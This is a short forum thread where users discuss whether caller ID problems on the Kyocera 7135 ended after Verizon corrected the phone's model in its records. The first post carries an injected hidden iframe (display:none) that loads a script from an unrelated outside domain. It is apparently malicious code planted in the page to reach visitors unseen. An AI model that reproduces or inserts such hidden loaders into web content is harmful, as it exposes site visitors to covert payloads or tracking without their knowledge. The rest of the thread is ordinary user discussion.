+ Reply to Thread

Caller ID Fixed?

Ever since my phone was changed in Verizon's records to a Kyocera 7135 I haven't had the caller ID problem. This may be a coincidence, but maybe the problem has been fixed. Is there anyone else who's 7135 who still has the caller ID problem and has confirmed with Verizon that their phone is reflected as a 7135?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I still have the CID issue, and I told 'em it was a 7135 when it was activated. Some numbers show properly, but my home and work numbers do not (and they're both in my Address Book)...

Jsimon,
    You might want to verify their records. I told them I had a 7135 but later when I called them, it was listed as something else (820?)

Mind you, I've never had the caller ID problem but I don't think you should count on them putting it in their database they way you told them in the beginning.

Re: Caller ID Fixed?

Originally posted by RMSko
    Ever since my phone was changed in Verizon's records to a Kyocera 7135 I haven't had the caller ID problem. This may be a coincidence, but maybe the problem has been fixed. Is there anyone else who's 7135 who still has the caller ID problem and has confirmed with Verizon that their phone is reflected as a 7135?
    You sure it's 100% fixed? I could be a fluke as I sometimes have no problem for a day, but then I'll occasionally would have that problem.

Re: Re: Caller ID Fixed?

Originally posted by nl4jy
    You sure it's 100% fixed? I could be a fluke as I sometimes have no problem for a day, but then I'll occasionally would have that problem.
    Well it's been three days and caller ID has been working all three days, but I'll keep checking and let you know. In the past caller ID would only work about 30% of the time.